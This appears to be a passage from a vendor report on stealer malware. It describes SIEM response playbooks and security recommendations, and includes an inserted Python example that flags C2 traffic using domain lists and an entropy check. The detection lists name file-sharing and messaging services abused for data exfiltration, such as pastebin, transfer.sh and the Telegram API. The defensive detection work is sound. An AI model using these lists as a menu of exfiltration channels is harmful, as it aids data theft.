Phishing remains one of the most common forms of cybercrime, with an estimated 3.4 billion spam emails sent every day. It serves as one of the primary attack vectors for stealer malware. Leveraging human emotions such as greed, fear, and desire, attackers exploit vulnerabilities through social engineering tactics, often via email-based schemes. This playbook investigates and responds to suspicious phishing incidents, minimizing response time and reducing the risk of human error.

In recent times, phishing attacks have evolved to include QR codes, a tactic known as "Quishing". It is very difficult for an email security gateway to detect and is easily passed on to the user. To counter such threats, we have a playbook called "Email Forensics - Lite". This playbook provides a range of actions and scripts to extract as much detail as possible, such as sender IP details, URL details, and attachment details, including QR data: it scans for and decodes the QR code in the attached image, and if the data includes a URL, it is treated as an artifact. The extracted IP and URL information is enriched with threat intelligence sources such as VirusTotal and Recorded Future.

https://www.logpoint.com/en/blog/emerging-threats/email-investigation-and-response-using-logpoint/

Osquery Investigate Host

This playbook retrieves essential host information including the operating system version, system uptime, logged-in users, startup items, firewall status, security patch details, and more. This data can then be used to feed different response playbooks.

Osquery Investigate Process

This playbook aids in identifying malicious processes by querying them in VirusTotal and detecting any established network connections, which could be an indication of a backdoor. The Osquery Investigate Process playbook can also be used to retrieve process communication information and DLL load information to determine whether any suspicious DLL has been loaded.

Malicious File Containment

Phishing is a major vector for cyberattacks, often involving weaponized attachments used in conjunction with social engineering techniques to trick victims into executing them. Furthermore, in every case, additional files are dropped in a location where they can blend in with normal operation. This playbook covers the investigation and containment of such malicious binaries once they have been dropped on the system. It compares the hash of the dropped file with threat intelligence sources, and if it is found to be malicious, the linked processes are terminated and the file is removed. The playbook then looks for that hash on other endpoints to identify potentially infected machines and takes the same steps wherever it is found. To carry out these activities, the playbook makes use of the "AgentX Terminate Process" and "AgentX Remove Item" playbooks, which enable analysts to terminate malicious processes and delete malicious files from infected machines, reducing MTTR.

Disable Schedule Task

Most malware leverages scheduled tasks to remain persistent. We can use this playbook to disable suspicious scheduled tasks.

Possible Command and Control

Adversaries rely heavily on command and control (C2) communication to maintain control over compromised systems. This playbook is intended to detect C2 server communication. It employs a threat intelligence platform to evaluate IP, source address, and domain reputation. It also employs entropy to identify domains with random domain names.
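The "Network Connection to Suspicious Server" query in the detection chapter matches URLs and domains against fixed lists, and the "Possible Command and Control" playbook above adds an entropy check for random-looking domain names. The following added example, not the report's or Logpoint's code, combines both over constructed network events: trimmed copies of the page's URL and domain lists, plus Shannon entropy of the second-level label. The entropy threshold, the minimum label length and the crude second-level-label extraction (which assumes a one-label public suffix) are this example's assumptions, not values from the page.

```python
"""Added example (not Logpoint's code): C2 indicator matching from the page's URL/domain
lists plus a Shannon-entropy check for random-looking domains."""
import math
from fnmatch import fnmatchcase
from urllib.parse import urlsplit

# Trimmed copies of the page's lists.
URL_PATTERNS = ["*dl.dropboxusercontent.com*", "*.pastebin.com*", "*cdn.discordapp.com/attachments*",
                "*mega.nz*", "*transfer.sh*", "*api.telegram.org*"]
DOMAIN_PATTERNS = ["*dropboxusercontent.com*", "*pastebin.com*", "*cdn.discordapp.com",
                   "*mega.nz*", "transfer.sh", "*api.telegram.org"]
ENTROPY_THRESHOLD = 3.8   # assumption: bits per character of the second-level label
MIN_LABEL_LEN = 12        # assumption: short labels cannot carry enough entropy to judge


def shannon_entropy(s):
    """Bits per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(domain):
    """'k3x9q7vz2pd8mf4r' for 'k3x9q7vz2pd8mf4r.com'. Assumes a one-label public suffix;
    production code should consult the Public Suffix List instead."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def assess(event):
    """Return the reasons a network event (fields: url, domain) looks like C2 infrastructure."""
    reasons = []
    url = event.get("url", "")
    domain = event.get("domain") or ((urlsplit(url).hostname or "") if url else "")
    if url and any(fnmatchcase(url.lower(), p) for p in URL_PATTERNS):
        reasons.append("url_ioc")
    if domain and any(fnmatchcase(domain.lower(), p) for p in DOMAIN_PATTERNS):
        reasons.append("domain_ioc")
    if domain:
        label = second_level_label(domain)
        if len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= ENTROPY_THRESHOLD:
            reasons.append("high_entropy_domain")
    return reasons


# Constructed sample events, not captured traffic.
SAMPLE_EVENTS = [
    {"url": "https://api.telegram.org/bot<placeholder-token>/", "domain": "api.telegram.org"},
    {"url": "http://k3x9q7vz2pd8mf4r.com/update", "domain": "k3x9q7vz2pd8mf4r.com"},
    {"url": "https://www.logpoint.com/en/"},
    {"domain": "stackoverflow.com"},   # long but pronounceable: stays under the threshold
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(assess(event) or ["ok"], event)
```

Entropy on its own is a weak signal: a thirteen-letter dictionary word like "stackoverflow" already scores about 3.55 bits per character, which is why the threshold is set above it and why the playbook pairs the check with reputation lookups rather than alerting on entropy alone.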
When malicious C2 is detected, it can block the associated server addresses or domains.

Recommendation

Conduct Security Awareness Training Regularly

Phishing is one of the primary methods for delivering stealer malware. Social engineering techniques such as phishing, smishing, pretexting, and baiting deceive employees into downloading and executing malware, disclosing confidential information, or performing unauthorized actions. To combat these threats, organizations should train employees regularly on recognizing and responding to social engineering attacks such as phishing emails, including simulated exercises that mimic real-world scenarios. These simulations help identify susceptible employees, so that organizations can provide them with the additional training and support they need to recognize and respond to such threats. Furthermore, if employees suspect they have been the victim of a social engineering attack, a formal process should be provided for them to report it, including alerting the appropriate people and taking immediate steps to contain the incident and minimize any potential damage.

Use Updated Security Software

Despite the critical importance of regularly updating devices, browsers, and other software applications, many organizations neglect this security practice, leaving their systems exposed to known vulnerabilities and cyber threats. Organizations can significantly reduce the risk of malware infections and data breaches by keeping software updated and ensuring the installation of the latest security patches and bug fixes. Where patching is unavailable or not feasible, organizations should apply the vendor's mitigations. Additionally, when faced with numerous security issues, organizations should prioritize them by severity and apply patches or mitigations accordingly.

Enforce Strong Password Policy

Organizations should enforce strong password policies to enhance their security posture. These policies typically require a minimum password length of eight characters and limit the number of password attempts before account lockout.

Furthermore, organizations are advised to refrain from mandating frequent password resets for their employees, limiting resets to no more than once per year. Additionally, organizations should implement a policy to monitor newly set passwords: these passwords should be checked against lists of common and compromised passwords to ensure their strength and integrity.

Implement Multi-factor Authentication

Implementing Multi-Factor Authentication (MFA) is crucial for bolstering security against unauthorized access to user accounts, particularly where passwords may be compromised. Organizations are strongly advised to deploy MFA across all user accounts, with particular emphasis on remote access and cloud-based services. Additionally, making MFA mandatory for privileged actions is highly recommended for enhancing overall security posture.

Implement Network Segmentation

Perform network segmentation to keep essential systems and sensitive data apart from the rest of the network. This helps to confine possible breaches and minimize attacker lateral movement.

Use Cyber Security Solutions

Use cybersecurity solutions such as firewalls, intrusion detection systems, and DDoS protection tools to prevent unauthorized access attempts and identify botnet activity. In addition, implement an Endpoint Protection Platform for host-level security. Host-level security solutions like AgentX can help detect and prevent malware infections, including stealer malware. These solutions provide an additional layer of protection by monitoring the activity of processes and services running on your devices and alerting you to any suspicious or malicious activity.

Backup and Disaster Recovery Planning

Regularly backing up your important data is essential to safeguard against data loss and security breaches. However, relying on a single backup copy may not suffice to ensure the safety of your data. The 3-2-1 backup policy recommends creating three copies of your critical data, storing them in two different formats or locations, and keeping one copy offsite. Having an offline backup, inaccessible from the internet, is a vital component of a robust backup strategy. While online backups offer quick access to your data, offline backups provide an additional layer of protection against data loss. This comprehensive approach ensures redundancy and enables swift recovery from data loss resulting from hardware failures, malware infections, natural disasters, or other unforeseen circumstances.

Enable Proper Logging and Visibility

Proper logging, asset visibility, and system monitoring are essential components of a robust cybersecurity strategy. These measures provide an overview of the network and help detect anomalies that indicate a security threat. They play an important role in detecting and preventing attacks in their early stages, enhancing the overall cybersecurity posture. It is also crucial to ensure that logs are collected from every system so that coverage is comprehensive.

Proper Incident Response Plan

Develop and consistently implement an incident response plan to address security incidents promptly and efficiently. Conducting regular incident response drills is equally important to assess an organization's readiness to handle security incidents effectively. These drills help identify gaps in the incident response plan and enhance the organization's preparedness to respond to real-world incidents.

Conclusion

Stealer malware poses a significant threat to organizations, and its proliferation is expected to keep growing through its expansion and availability on underground markets. Consequently, it is imperative for organizations to proactively adapt and enhance their security measures to counter this emerging threat effectively. Logpoint Converged SIEM provides a comprehensive set of tools and capabilities for detecting, analyzing, and mitigating the impact of stealer malware. It enables security teams to automate key incident response procedures, collect critical logs and data, and enhance malware detection and removal operations. Logpoint Converged SIEM, which includes investigation and response playbooks as well as AgentX, our native endpoint agent, provides organizations with the tools they need to monitor risks, strengthen defenses, and protect against stealer malware activity in today's dynamic threat landscape.

At Logpoint, we remain vigilant and committed to preventing such attacks. We continually research and develop new alerts for Logpoint Converged SIEM and integrate new playbooks to address emerging threats like stealer malware. Together, we can effectively combat these evolving cybersecurity challenges. Happy hunting!

About Logpoint

Logpoint is the creator of a reliable, innovative cybersecurity operations platform — empowering organizations worldwide to thrive in a world of evolving threats. By combining sophisticated technology and a profound understanding of customer challenges, Logpoint bolsters security teams' capabilities while helping them combat current and future threats. Logpoint offers SIEM, UEBA, and SOAR technologies in a complete platform that efficiently detects threats, minimizes false positives, autonomously prioritizes risks, responds to incidents, and much more. Headquartered in Copenhagen, Denmark, with offices around the world, Logpoint is a multinational, multicultural, and inclusive company. For more information visit www.logpoint.com (https://www.logpoint.com/en/).